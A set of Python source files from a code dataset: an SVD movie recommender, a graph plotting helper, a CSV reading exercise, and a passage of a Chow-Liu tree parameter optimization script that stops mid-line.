+{"seq_id":"209208842","text":"import pandas as pd\nimport numpy as np\nfrom scipy.sparse.linalg import svds\nfrom flask_caching import Cache\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# cache = Cache()\n\nclass SVDEngine:\n def __init__(self, ratingsDF):\n\n logger.info(\"Initializing SVDEngine....\")\n\n ratings = ratingsDF.pivot(index = 'userId', columns ='movieId', values = 'rating').fillna(0)\n self.allPredictions = self.getPredictionsAll(ratings)\n\n # @cache.cached(timeout = 10, key_prefix='getPredictionsAll')\n def getPredictionsAll(self,ratings):\n R = ratings.values #.as_matrix()\n user_ratings_mean = np.mean(R, axis = 1)\n Ratings_demeaned = R - user_ratings_mean.reshape(-1, 1)\n U, sigma, Vt = svds(Ratings_demeaned, k = 50)\n sigma = np.diag(sigma)\n\n allPred = np.dot(np.dot(U, sigma), Vt) + user_ratings_mean.reshape(-1, 1)\n return pd.DataFrame(allPred, columns = ratings.columns)\n\n def recommend_movies(self, userID, movies, original_ratings, num_recommendations=10):\n\n logger.info(\"Getting top 10 Recommendation....\")\n \n # # Get and sort the user's predictions\n # user_row_number = userID - 1 # User ID starts at 1, not 0\n # sorted_user_predictions = self.allPredictions.iloc[user_row_number].sort_values(ascending=False) # User ID starts at 1\n \n # # Get the user's data and merge in the movie information.\n # user_data = original_ratings[original_ratings.userId == (userID)]\n # user_full = (user_data.merge(movies, how = 'left', left_on = 'movieId', right_on = 'movieId').\n # sort_values(['rating'], ascending=False)\n # )\n\n # # Recommend the highest predicted rating movies that the user hasn't seen yet.\n # recommendations = (movies[~movies['movieId'].isin(user_full['movieId'])].\n # merge(pd.DataFrame(sorted_user_predictions).reset_index(), how = 'left',\n # left_on = 'movieId',\n # right_on = 'movieId').\n # rename(columns = {user_row_number: 'Predictions'}).\n # sort_values('Predictions', ascending = False).\n # iloc[:num_recommendations, :-1]\n # )\n # recommendations = recommendations.head(10)\n # recomList = []\n # for index, row in recommendations.iterrows():\n # recomList.append({\"movieID\" : row['movieId'],\"Title\" : row['title'],\"Genre\" : row['genres']})\n \n # return recomList\n\n recommendations = self.getPredictions(userID, movies, original_ratings).head(10)\n recomList = []\n for index, row in recommendations.iterrows():\n recomList.append({\"movieID\" : row['movieId'],\"Title\" : row['title'],\"Genre\" : row['genres']})\n \n return recomList\n \n \n def getRating(self, model, userID, movieID):\n rating = model.predict(userID, movieID)\n return {\"rating\" : rating.est}\n\n # def getRating(self, userID, movieID, movies, original_ratings):\n # rating = self.getPredictions(userID, movies, original_ratings)\n # return {\"rating\" : rating[rating['movieId'] == movieID]['Predictions'].to_list()[0]}\n\n def getPredictions(self, userID, movies, original_ratings):\n # Get and sort the user's predictions\n user_row_number = userID - 1 # User ID starts at 1, not 0\n sorted_user_predictions = self.allPredictions.iloc[user_row_number].sort_values(ascending=False) # User ID starts at 1\n \n # Get the user's data and merge in the movie information.\n user_data = original_ratings[original_ratings.userId == (userID)]\n user_full = (user_data.merge(movies, how = 'left', left_on = 'movieId', right_on = 'movieId').\n sort_values(['rating'], ascending=False)\n )\n\n # Recommend the highest predicted rating movies that the user hasn't seen yet.\n predictions = (movies[~movies['movieId'].isin(user_full['movieId'])].\n merge(pd.DataFrame(sorted_user_predictions).reset_index(), how = 'left',\n left_on = 'movieId',\n right_on = 'movieId').\n rename(columns = {user_row_number: 'Predictions'}).\n sort_values('Predictions', ascending = False))\n \n return predictions\n\n def get_topN(self, model, userID, config):\n \n logger.info(\"Retrieving Top 10 Movie Recommendation....\")\n\n unique_ids = config.movieLensDF['itemID'].unique()\n \n # get the list of the ids that the userid 1001 has rated\n iids = config.movieLensDF.loc[config.movieLensDF['userID']==userID, 'itemID']\n \n # remove the rated movies for the recommendations\n movies_to_predict = np.setdiff1d(unique_ids,iids)\n \n my_recs = []\n for iid in movies_to_predict:\n my_recs.append((iid, model.predict(uid=userID,iid=iid).est))\n\n rawDF = pd.DataFrame(my_recs, columns=['iid', 'predictions']).sort_values('predictions', ascending=False).head(10)['iid']\n return rawDF.tolist()","sub_path":"svdEngine.py","file_name":"svdEngine.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"3780627","text":"import numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random as rd\n\ndef abre_matriz(arquivo):\n A = np.loadtxt(arquivo)\n G = nx.from_numpy_matrix(A)\n return G\n\ndef cria_labels(G,arquivo):\n B = open(\"ha30_name.txt\", 'r')\n Cidades = []\n for linha in B:\n linha = linha.strip(\"\\n\")\n Cidades.append(linha)\n for v in G.nodes():\n G.nodes[v]['label'] = Cidades[v]\n return nx.get_edge_attributes(G,'label')\n\n for v in G.nodes():\n G.nodes[v]['label'] = Cidades[v]\n return nx.get_node_attributes(G,'label')\n\ndef plot(nome,titulo,nome_arquivo):\n plt.figure(1, figsize=(18, 12)) \n pos=nx.spring_layout(nome) \n plt.axis('off')\n nx.draw_networkx(nome,pos)\n nx.draw_networkx_edges(nome,pos,width=0.4)\n nx.draw_networkx_nodes(nome,pos,node_size=500)\n plt.title(titulo, size=20)\n arquivo = nome_arquivo + \".png\"\n plt.savefig(arquivo)\n plt.show()\n\ndef raiz(G):\n rd.seed(None)\n return rd.randint(0,G.number_of_nodes())","sub_path":"Projeto4/Funcoes_problema4.py","file_name":"Funcoes_problema4.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"25581946","text":"\r\n#########################\r\n##\r\n#########################\r\n\r\n# 파일을 연다.\r\nsIn = \"./st01.Python기초/py31파일처리/file/data.csv\"\r\nf = open(sIn, \"r\")\r\n\r\n# 파일 안의 각 줄을 처리한다.\r\nfor line in f.readlines():\r\n\r\n # 공백 문자를 없앤다.\r\n line = line.strip()\r\n\r\n # 줄을 출력한다.\r\n print(line)\r\n\r\n # 줄을 쉼표로 분리한다.\r\n parts = line.split(\",\")\r\n\r\n # 각 줄의 필드를 출력한다.\r\n for part in parts:\r\n print(\" \", part)\r\n","sub_path":"st01.Python기초/py31파일처리/py31_11_csv.py","file_name":"py31_11_csv.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"95841424","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 31 21:26:43 2020\ninstead of marginal, we get the sufficiet statistics from P\nThis version we have evidences\n\nuse the common format to update derivative\n\n\"\"\"\n\n# optimization problem with chow-liu tree\nimport numpy as np\nfrom scipy.optimize import minimize\n#from scipy.optimize import Bounds # define the bound\n#from scipy import optimize\n\nfrom CLT_class import CLT\nfrom Util import *\nimport JT\nfrom MIXTURE_CLT import MIXTURE_CLT, load_mt\n\nimport sys\nimport time\nimport copy\n\nimport util_opt\nimport utilM\n\n\n\n\n\ndef compute_cross_entropy_mt_sampling_evid(Q, samples, evid_list):\n LL_Q = Q.getWeights(samples)\n #print ('P:', np.sum(LL_P))\n #print ('Q:', np.sum(LL_Q))\n #print (LL_P.shape)\n #approx_cross_entropy = np.sum(np.exp(LL_P)*LL_Q)\n #approx_cross_entropy = np.sum((LL_P - LL_Q))\n \n cond_cpt_evid = Q.instantiation(evid_list)\n evid_prob = utilM.ve_tree_bin(Q.topo_order, Q.parents, cond_cpt_evid) \n \n #print (np.sum(LL_Q)/samples.shape[0])\n #print (evid_prob)\n\n approx_cross_entropy = np.sum(LL_Q)/samples.shape[0] - np.log(evid_prob)\n return approx_cross_entropy \n\n\n\n'''\nReplace cpt with random numbers\n'''\ndef pertub_model(model, model_type='clt', percent=0.1):\n \n \n if model_type=='clt':\n topo_order = model.topo_order\n #parents = model.parents\n updated_cpt = np.copy(model.cond_cpt)\n peturb_no = int(np.round(topo_order.shape[0]* percent))\n #print (peturb_no)\n #rand_number = np.random.randint(topo_order.shape[0], size=peturb_no)\n rand_number = np.random.choice(topo_order.shape[0], size=peturb_no, replace=False)\n \n \n #rand_number[0] = 0\n #print ('rand_number',rand_number)\n \n rand_decimal = np.random.rand(peturb_no, 2, 2)\n \n #print (rand_decimal)\n #print (np.sum(rand_decimal, axis = 1))\n\n \n # make a valid cpt\n norm_const = np.sum(rand_decimal, axis = 1)\n \n rand_decimal[:,:,0] = rand_decimal[:,:,0]/norm_const[:,0, np.newaxis]\n rand_decimal[:,:,1] = rand_decimal[:,:,1]/norm_const[:,1, np.newaxis]\n \n #print (rand_decimal)\n #print (updated_cpt)\n root = topo_order[0]\n if root in rand_number:\n sum_val = rand_decimal[0,0,0] + rand_decimal[0,1,1] \n rand_decimal[0,0,0] = rand_decimal[0,0,1] = rand_decimal[0,0,0]/sum_val\n rand_decimal[0,1,0] = rand_decimal[0,1,1] = rand_decimal[0,1,1]/sum_val\n \n \n #print (rand_decimal)\n\n #updated_cpt[rand_number,:,:] = 0.5\n updated_cpt[rand_number,:,:] = rand_decimal\n #print (updated_cpt[rand_number])\n \n return updated_cpt\n\n#\"\"\"\n#using theta_{\\bar{b}|a} = 1-theta_{b|a}\n#Cleaned all the commented code based on version 0704\n#\"\"\"\n#\n#def get_single_var_marginals(topo_order, parents, cond_cpt):\n# # get marginals:\n# marginals= np.zeros((topo_order.shape[0],2))\n# #marginal_R[topo_order[0]] = theta[0,:,0]\n# marginals[topo_order[0]] = cond_cpt[0,:,0]\n# for k in range (1,topo_order.shape[0]):\n# c = topo_order[k]\n# p = parents[c]\n# marginals[c] = np.einsum('ij,j->i',cond_cpt[k], marginals[p])\n# \n# return marginals\n#\n#\n## ordered by topo order\n#def get_edge_marginals(topo_order, parents, cond_cpt, single_marginal):\n# \n# # edge_marginals ordered by topo order\n# edge_marginals = np.zeros_like(cond_cpt)\n# edge_marginals[0,0,0] = cond_cpt[0,0,0]\n# edge_marginals[0,1,1] = cond_cpt[0,1,1]\n# \n# parents_order = parents[topo_order]\n# topo_marginals = single_marginal[parents_order[1:]] # the parent marignals, ordered by topo_order \n# \n# edge_marginals[1:] = np.einsum('ijk,ik->ijk',cond_cpt[1:], topo_marginals)\n#\n# return edge_marginals\n'''\n# compute P(x|e)log(R(x|e))\n#\n'''\ndef cross_entropy_evid(P, R, evid_list, non_evid_var):\n cross_entropy = 0\n \n total_n_var = len(evid_list)+non_evid_var.shape[0] #evid+non-evid\n \n # assume P is a tree \n jt_P = JT.JunctionTree()\n jt_P.learn_structure(P.topo_order, P.parents, P.cond_cpt)\n\n \n P_xy_evid = JT.get_marginal_JT(jt_P, evid_list, non_evid_var)\n #print (P_xy_evid.shape)\n #p_xy_norm = Util.normalize2d(p_xy)\n P_x_evid = np.zeros((non_evid_var.shape[0], 2))\n #p_xy = mt_R.clt_list[c].inference(mt_R.clt_list[c].cond_cpt, ids)\n \n P_x_evid[:,0] = P_xy_evid[0,:,0,0] + P_xy_evid[0,:,1,0]\n P_x_evid[:,1] = P_xy_evid[0,:,0,1] + P_xy_evid[0,:,1,1] \n P_x_evid[0,0] = P_xy_evid[1,0,0,0] + P_xy_evid[1,0,1,0]\n P_x_evid[0,1] = P_xy_evid[1,0,0,1] + P_xy_evid[1,0,1,1]\n \n # Probablity of evidence according to P\n P_e = np.sum(P_x_evid[0,:])\n #print (P_xy_evid)\n #print (P_x_evid)\n #print (np.sum(P_x_evid, axis = 1))\n #print (P_e)\n \n \n # Probablity of evidence according to R\n cond_cpt_e = R.instantiation(evid_list)\n R_e = utilM.ve_tree_bin(R.topo_order, R.parents, cond_cpt_e)\n #print(R_e)\n \n \n # mark which variable is evidence\n evid_flag = np.full(total_n_var,-1) #-1 means non evidence\n evid_arr = np.asarray(evid_list)\n evid_flag[evid_arr[:,0]] = evid_arr[:,1] \n #print (evid_flag)\n \n \n P_xy_evid_full = np.zeros((total_n_var, total_n_var, 2,2))\n #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n P_xy_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_evid\n P_x_evid_full = np.zeros((total_n_var, 2))\n P_x_evid_full[non_evid_var,:] = P_x_evid\n \n #print (P_xy_evid_full)\n #print (P_xy_evid)\n \n # root is the special case\n# for i in range (1, R.topo_order.shape[0]):\n# cld = R.topo_order[i]\n# par = R.parents[cld]\n# \n# ind_c = np.where(non_evid_var==cld)[0]\n# ind_p = np.where(non_evid_var==par)[0]\n# val_c = evid_flag[cld]\n# val_p = evid_flag[par]\n# print (ind_c, ind_p)\n# # both cld and par are not evid\n# if val_c ==-1 and val_p ==-1:\n# cross_entropy += np.sum(P_xy_evid[ind_c, ind_p] * np.log(cond_cpt_e[i]))\n# # cld is evidence \n# elif val_c !=-1 and val_p ==-1:\n# cross_entropy += np.sum(P_x_evid[ind_c] * np.log(cond_cpt_e[i,val_c,:]))\n# # par is evidence \n# elif val_c ==-1 and val_p !=-1:\n# cross_entropy += np.sum(P_x_evid[ind_p] * np.log(cond_cpt_e[i,:,val_p]))\n# # else both cld and par are evidence\n# else:\n# cross_entropy += P_e * np.log(cond_cpt_e[i,val_c,val_p])\n# \n# \n# print ('cross entropy: ', cross_entropy) \n \n# cross_entropy = 0\n # root is the special case\n for i in range (1, R.topo_order.shape[0]):\n cld = R.topo_order[i]\n par = R.parents[cld]\n \n val_c = evid_flag[cld]\n val_p = evid_flag[par]\n # both cld and par are not evid\n if val_c ==-1 and val_p ==-1:\n cross_entropy += np.sum(P_xy_evid_full[cld, par] * np.log(cond_cpt_e[i]))\n # cld is evidence \n elif val_c !=-1 and val_p ==-1:\n cross_entropy += np.sum(P_x_evid_full[cld] * np.log(cond_cpt_e[i,val_c,:]))\n # par is evidence \n elif val_c ==-1 and val_p !=-1:\n cross_entropy += np.sum(P_x_evid_full[par] * np.log(cond_cpt_e[i,:,val_p]))\n # else both cld and par are evidence\n else:\n cross_entropy += P_e * np.log(cond_cpt_e[i,val_c,val_p])\n \n # root\n R_root = R.topo_order[0]\n val_root = evid_flag[R_root]\n # not evid\n if val_root == -1:\n R_root_marginal = np.array([cond_cpt_e[0,0,0], cond_cpt_e[0,1,1]])\n cross_entropy += np.sum(P_x_evid_full[R_root]* np.log(R_root_marginal))\n else:\n cross_entropy += P_e * np.log(cond_cpt_e[i,val_root,val_root])\n \n \n print ('cross entropy: ', cross_entropy) \n \n cross_entropy -= P_e * np.log(R_e)\n \n print ('cross entropy: ', cross_entropy)\n\n \n return cross_entropy\n\n#'''\n## compute P(x|e)log(R(x|e)), when marginal from P is given\n##\n#'''\n#def cross_entropy_evid_marginal(P_xy_evid_full, P_x_evid_full, R, evid_list, non_evid_var):\n# cross_entropy = 0\n# \n## total_n_var = len(evid_list)+non_evid_var.shape[0] #evid+non-evid\n## \n## # assume P is a tree \n## jt_P = JT.JunctionTree()\n## jt_P.learn_structure(P.topo_order, P.parents, P.cond_cpt)\n##\n## \n## P_xy_evid = JT.get_marginal_JT(jt_P, evid_list, non_evid_var)\n## #print (P_xy_evid.shape)\n## #p_xy_norm = Util.normalize2d(p_xy)\n## P_x_evid = np.zeros((non_evid_var.shape[0], 2))\n## #p_xy = mt_R.clt_list[c].inference(mt_R.clt_list[c].cond_cpt, ids)\n## \n## P_x_evid[:,0] = P_xy_evid[0,:,0,0] + P_xy_evid[0,:,1,0]\n## P_x_evid[:,1] = P_xy_evid[0,:,0,1] + P_xy_evid[0,:,1,1] \n## P_x_evid[0,0] = P_xy_evid[1,0,0,0] + P_xy_evid[1,0,1,0]\n## P_x_evid[0,1] = P_xy_evid[1,0,0,1] + P_xy_evid[1,0,1,1]\n## \n## # Probablity of evidence according to P\n## P_e = np.sum(P_x_evid[0,:])\n## #print (P_xy_evid)\n## #print (P_x_evid)\n## #print (np.sum(P_x_evid, axis = 1))\n## #print (P_e)\n## \n## \n# # Probablity of evidence according to R\n# cond_cpt_e = R.instantiation(evid_list)\n# R_e = utilM.ve_tree_bin(R.topo_order, R.parents, cond_cpt_e)\n# #print(R_e)\n## \n## \n## # mark which variable is evidence\n## evid_flag = np.full(total_n_var,-1) #-1 means non evidence\n## evid_arr = np.asarray(evid_list)\n## evid_flag[evid_arr[:,0]] = evid_arr[:,1] \n## #print (evid_flag)\n## \n## \n## P_xy_evid_full = np.zeros((total_n_var, total_n_var, 2,2))\n## #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n## P_xy_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_evid\n## P_x_evid_full = np.zeros((total_n_var, 2))\n## P_x_evid_full[non_evid_var,:] = P_x_evid\n## \n## #print (P_xy_evid_full)\n## #print (P_xy_evid)\n## \n## # root is the special case\n### for i in range (1, R.topo_order.shape[0]):\n### cld = R.topo_order[i]\n### par = R.parents[cld]\n### \n### ind_c = np.where(non_evid_var==cld)[0]\n### ind_p = np.where(non_evid_var==par)[0]\n### val_c = evid_flag[cld]\n### val_p = evid_flag[par]\n### print (ind_c, ind_p)\n### # both cld and par are not evid\n### if val_c ==-1 and val_p ==-1:\n### cross_entropy += np.sum(P_xy_evid[ind_c, ind_p] * np.log(cond_cpt_e[i]))\n### # cld is evidence \n### elif val_c !=-1 and val_p ==-1:\n### cross_entropy += np.sum(P_x_evid[ind_c] * np.log(cond_cpt_e[i,val_c,:]))\n### # par is evidence \n### elif val_c ==-1 and val_p !=-1:\n### cross_entropy += np.sum(P_x_evid[ind_p] * np.log(cond_cpt_e[i,:,val_p]))\n### # else both cld and par are evidence\n### else:\n### cross_entropy += P_e * np.log(cond_cpt_e[i,val_c,val_p])\n### \n### \n### print ('cross entropy: ', cross_entropy) \n## \n## cross_entropy = 0\n# # root is the special case\n# for i in range (1, R.topo_order.shape[0]):\n# cld = R.topo_order[i]\n# par = R.parents[cld]\n# \n# val_c = evid_flag[cld]\n# val_p = evid_flag[par]\n# # both cld and par are not evid\n# if val_c ==-1 and val_p ==-1:\n# cross_entropy += np.sum(P_xy_evid_full[cld, par] * np.log(cond_cpt_e[i]))\n# # cld is evidence \n# elif val_c !=-1 and val_p ==-1:\n# cross_entropy += np.sum(P_x_evid_full[cld] * np.log(cond_cpt_e[i,val_c,:]))\n# # par is evidence \n# elif val_c ==-1 and val_p !=-1:\n# cross_entropy += np.sum(P_x_evid_full[par] * np.log(cond_cpt_e[i,:,val_p]))\n# # else both cld and par are evidence\n# else:\n# cross_entropy += P_e * np.log(cond_cpt_e[i,val_c,val_p])\n# \n# # root\n# R_root = R.topo_order[0]\n# val_root = evid_flag[R_root]\n# # not evid\n# if val_root == -1:\n# R_root_marginal = np.array([cond_cpt_e[0,0,0], cond_cpt_e[0,1,1]])\n# cross_entropy += np.sum(P_x_evid_full[R_root]* np.log(R_root_marginal))\n# else:\n# cross_entropy += P_e * np.log(cond_cpt_e[i,val_root,val_root])\n# \n# \n# #print ('cross entropy: ', cross_entropy) \n# \n# cross_entropy -= P_e * np.log(R_e)\n# \n# #print ('cross entropy: ', cross_entropy)\n#\n# \n# return cross_entropy\n\n\ndef cross_entropy_evid_parm(R, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag):\n \n cross_entropy = 0\n\n \n cond_cpt_e = R.instantiation(evid_list)\n #cond_cpt_e = np.nan_to_num(cond_cpt_e)\n #R_e = utilM.ve_tree_bin(R.topo_order, R.parents, cond_cpt_e)\n \n #cross_PlogR = util_opt.compute_cross_entropy_parm(pair_marginal_P,marginal_P, parents, topo_order, theta)\n for i in range (1, R.topo_order.shape[0]):\n cld = R.topo_order[i]\n par = R.parents[cld]\n \n val_c = evid_flag[cld]\n val_p = evid_flag[par]\n # both cld and par are not evid\n if val_c ==-1 and val_p ==-1:\n cross_entropy += np.sum(pair_marginal_P[cld, par] * np.log(cond_cpt_e[i]))\n # cld is evidence \n elif val_c !=-1 and val_p ==-1:\n cross_entropy += np.sum(marginal_P[cld] * np.log(cond_cpt_e[i,val_c,:]))\n # par is evidence \n elif val_c ==-1 and val_p !=-1:\n cross_entropy += np.sum(marginal_P[par] * np.log(cond_cpt_e[i,:,val_p]))\n # else both cld and par are evidence\n else:\n cross_entropy += np.log(cond_cpt_e[i,val_c,val_p])\n \n # root\n R_root = R.topo_order[0]\n val_root = evid_flag[R_root]\n # not evid\n if val_root == -1:\n R_root_marginal = np.array([cond_cpt_e[0,0,0], cond_cpt_e[0,1,1]])\n cross_entropy += np.sum(marginal_P[R_root]* np.log(R_root_marginal))\n else:\n cross_entropy += np.log(cond_cpt_e[0,val_root,val_root])\n #cross_entropy += 0\n #print (cond_cpt_e)\n \n #cross_entropy -= np.log(R_e)\n \n return cross_entropy\n \n\n# the objective function\ndef objective(x, clt_R, cpt_Q, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag):\n #print (marginal_P)\n #print (pair_marginal_P)\n \n n_variable = evid_flag.shape[0]\n lamda = x[0]\n theta = x[1:].reshape(n_variable,2,2)\n \n clt_R.cond_cpt = theta\n \n # get marginals:\n #marginal_R = get_single_var_marginals(topo_order, parents, theta)\n \n # first part\n cross_PlogR = cross_entropy_evid_parm(clt_R, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag)\n first_part = lamda*(cross_PlogR)\n \n #print ('first part: ', first_part)\n \n # second part:\n sec_part = (1.0-lamda)*(np.sum(cpt_Q *np.log(theta)))\n \n # maximize is the negation of minimize\n #print ('obj value: ', first_part+sec_part)\n return -(first_part+sec_part)\n \n \n \n# the derivative function\ndef derivative(x, clt_R, cpt_Q, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag):\n\n lamda = x[0]\n theta = x[1:].reshape(marginal_P.shape[0],2,2)\n n_variable = evid_flag.shape[0]\n \n \n clt_R.cond_cpt = theta\n #print (pair_marginal_P.shape)\n\n \n # derivative of lambda\n cross_PlogR = cross_entropy_evid_parm(clt_R, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag)\n der_lam = cross_PlogR - np.sum(cpt_Q *np.log(theta))\n \n # derivativ of thetas\n der_theta = np.zeros_like(theta)\n \n #cond_cpt_e = clt_R.instantiation(evid_list) \n jt_R = JT.JunctionTree()\n jt_R.learn_structure(clt_R.topo_order, clt_R.parents, clt_R.cond_cpt)\n\n \n #R_xy_evid = JT.get_marginal_JT(jt_R, evid_list, non_evid_var)\n R_xy_evid = JT.get_marginal_JT(jt_R, evid_list, np.arange(n_variable))\n# print (R_xy_evid)\n #p_xy_norm = Util.normalize2d(p_xy)\n #R_x_evid = np.zeros((non_evid_var.shape[0], 2))\n R_x_evid = np.zeros((n_variable, 2))\n #p_xy = mt_R.clt_list[c].inference(mt_R.clt_list[c].cond_cpt, ids)\n \n \n R_x_evid[:,0] = R_xy_evid[0,:,0,0] + R_xy_evid[0,:,1,0]\n R_x_evid[:,1] = R_xy_evid[0,:,0,1] + R_xy_evid[0,:,1,1] \n R_x_evid[0,0] = R_xy_evid[1,0,0,0] + R_xy_evid[1,0,1,0]\n R_x_evid[0,1] = R_xy_evid[1,0,0,1] + R_xy_evid[1,0,1,1]\n \n# print (R_x_evid)\n# sss\n \n R_xy_given_evid = Util.normalize2d(R_xy_evid)\n R_x_given_evid = Util.normalize1d(R_x_evid)\n \n# R_xy_given_evid_full = np.zeros((n_variable, n_variable, 2,2))\n# R_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = R_xy_given_evid\n# R_x_given_evid_full = np.zeros((n_variable, 2))\n# R_x_given_evid_full[non_evid_var,:] = R_x_given_evid\n \n \n R_xy_given_evid_full = R_xy_given_evid\n R_x_given_evid_full = R_x_given_evid\n \n '''P(x,u|e)-R(x,u|e), where (x,u) is one edge in R, ordered in topo_order of R'''\n edge_marginal_diff = np.zeros_like(cpt_Q)\n for i in range (1,n_variable):\n cld = clt_R.topo_order[i]\n par = clt_R.parents[cld]\n \n val_c = evid_flag[cld]\n val_p = evid_flag[par]\n # both cld and par are not evid\n if val_c ==-1 and val_p ==-1:\n edge_marginal_diff[i] = pair_marginal_P[cld, par] *(1- R_xy_given_evid_full[cld, par])\n # cld is evidence \n elif val_c !=-1 and val_p ==-1:\n #print (R_x_given_evid_full[cld])\n edge_marginal_diff[i,val_c,:] = marginal_P[cld] *(1- R_x_given_evid_full[cld])\n # par is evidence \n elif val_c ==-1 and val_p !=-1:\n edge_marginal_diff[i,:, val_p] = marginal_P[par] *(1- R_x_given_evid_full[par])\n # else both cld and par are evidence\n else:\n edge_marginal_diff[i, val_c,val_p] = 0\n \n #edge_marginal_P[i+1] = pair_marginal_P[cld, pa]\n \n root = clt_R.topo_order[0] \n val_root = evid_flag[root]\n # not evid\n if val_root == -1:\n edge_marginal_diff[0,0,:] = marginal_P[root,0]* (1 - R_x_given_evid_full[root,0])\n edge_marginal_diff[0,1,:] = marginal_P[root,1]* (1 - R_x_given_evid_full[root,1])\n else:\n edge_marginal_diff = 0\n \n #edge_marginal_P[0,0,:] = marginal_P[root,0]\n #edge_marginal_P[0,1,:] = marginal_P[root,1]\n #print (edge_marginal_P)\n \n der_theta[:,:,:] = lamda*edge_marginal_diff/theta+(1.0-lamda)*(cpt_Q[:,:,:]/theta[:,:,:])\n \n #print (der_theta)\n\n '''Apply theta_{\\bar{b}|a} = 1-theta_{b|a}'''\n # root: special case\n der_theta[0,0,0] -= der_theta[0,1,1]\n der_theta[0,1,1] = -der_theta[0,0,0]\n der_theta[0,0,1] = der_theta[0,0,0] \n der_theta[0,1,0] = der_theta[0,1,1]\n\n der_theta[1:,0,:] -= der_theta[1:,1,:]\n der_theta[1:,1,:] = -der_theta[1:,0,:]\n \n #print ('---')\n #print (der_theta)\n\n \n\n der = np.zeros_like(x)\n der[0] = der_lam\n der[1:] = der_theta.flatten() \n \n return der *(-1.0)\n\n\n#'''\n#Update the parameters of R directly from P\n#'''\n#def update_S_use_P(P_pair,P_single, S):\n# return Util.compute_conditional_CPT(P_pair, P_single, S.topo_order, S.parents)\n\n\n#'''\n#Add noise to distribution pairwise marignals of P, single variable marginal of P\n#Which will cause sum_i Pair(i,j)!=Single(j)\n#But it is guarateed that sum Pair(i,j) = 1, Pair(i,j) and Pair(j,i) is related\n#'''\n#def add_noise (P_pair, P_single, noise_mu, noise_std, percent_noise=0.1):\n# \n# n_var = P_single.shape[0]\n# #percent_noise = 0.1\n# # how many potential function that has noise\n# \n# num_noise = int(n_var*percent_noise)\n# #noise_pair = np.random.choice(n_var*n_var*2*2, size=num_var_noise)\n# \n# #percent_noise = 1\n# #num_var_noise = int(n_var*n_var*2*2* percent_noise)\n# #noise_var = np.random.choice(n_var*n_var*2*2, size=num_var_noise)\n# \n# \n# pair_noise= np.random.normal(loc=noise_mu, scale=noise_std, size=(num_noise,2,2))\n# single_noise = np.random.normal(loc=noise_mu, scale=noise_std, size=(num_noise,2))\n#\n# #print (noise.shape)\n# \n# P_pair_noise = np.zeros_like(P_pair)\n# P_single_noise = np.zeros_like(P_single)\n# \n# \n# \n# \n# noise_seq = np.random.choice(num_edges, size=num_pair_noise)\n# #print ('noise_seq:', noise_seq)\n# \n# edges = []\n# for i in range (n_var):\n# for j in range(i+1, n_var):\n# edges.append([i,j])\n# \n# \n# Q_noise = np.copy(P)\n# \n# for k,s in enumerate(noise_seq):\n# \n# [i,j] = edges[s]\n# #print (i,j) \n# #print (P[i,j])\n# \n# '''apply noise'''\n# Q_noise[i,j] += noise[k]\n# \n# '''Set all value between [0.01 ~ 0.99]'''\n# Q_noise[i,j][Q_noise[i,j] < 0.01] = 0.01\n# Q_noise[i,j][Q_noise[i,j] > 0.99] = 0.99\n# \n# '''normalize'''\n# Q_noise[i,j] /= np.sum(Q_noise[i,j])\n# #print (Q_noise[i,j])\n# \n# '''symetric'''\n#\n# Q_noise[j,i,0,0] = Q_noise[i,j,0,0]\n# Q_noise[j,i,0,1] = Q_noise[i,j,1,0]\n# Q_noise[j,i,1,0] = Q_noise[i,j,0,1]\n# Q_noise[j,i,1,1] = Q_noise[i,j,1,1]\n# \n# #print (Q_noise[j,i])\n# \n#\n##\n## \n# return Q_noise\n\n\ndef main_opt_clt():\n# \n #dataset_dir = sys.argv[2]\n #data_name = sys.argv[4]\n \n #dataset_dir = '../../dataset/'\n #data_name = 'nltcs'\n blur_flag = True\n #n_components_P = 3\n #decimals = 2 # how many decimals left for distribution P\n #tum_module = data_name+'_'+str(n_components_P)\n dataset_dir = sys.argv[2]\n data_name = sys.argv[4]\n #n_components_P = int(sys.argv[6])\n mt_dir = sys.argv[6]\n perturb_rate = float(sys.argv[8])\n e_percent = float(sys.argv[10])\n \n tum_module = data_name\n n_samples = 100000\n #e_percent = 0.2\n blur_flag = True\n \n print('------------------------------------------------------------------')\n print('Construct CLT using optimization methods')\n print('------------------------------------------------------------------')\n \n \n #train_filename = sys.argv[1]\n train_filename = dataset_dir + data_name + '.ts.data'\n test_filename = dataset_dir + data_name +'.test.data'\n valid_filename = dataset_dir + data_name + '.valid.data'\n \n #out_file = '../module/' + data_name + '.npz'\n train_dataset = np.loadtxt(train_filename, dtype=int, delimiter=',')\n valid_dataset = np.loadtxt(valid_filename, dtype=int, delimiter=',')\n test_dataset = np.loadtxt(test_filename, dtype=int, delimiter=',')\n print (\"********* Using Validation / Test Dataset in distribtuion 'P' ************\")\n full_dataset = np.concatenate((train_dataset, valid_dataset), axis=0)\n full_dataset = np.concatenate((full_dataset, test_dataset), axis=0)\n \n n_variables = train_dataset.shape[1]\n \n #n_evids = int(np.round(n_variables * e_percent, decimals = 0))\n \n #rand_var = np.random.choice(n_variables, size=n_evids, replace=False)\n #rand_rec = np.random.randint(train_dataset.shape[0], size = 1)\n #print (rand_var)\n #print (rand_rec)\n\n# evids = np.zeros((n_evids,2), dtype = int)\n# evids[:,0] = np.array(rand_var)\n# #evids[:,0] = np.array([0,1,2])\n# evids[:,1] = np.array(train_dataset[rand_rec, rand_var])\n \n evids 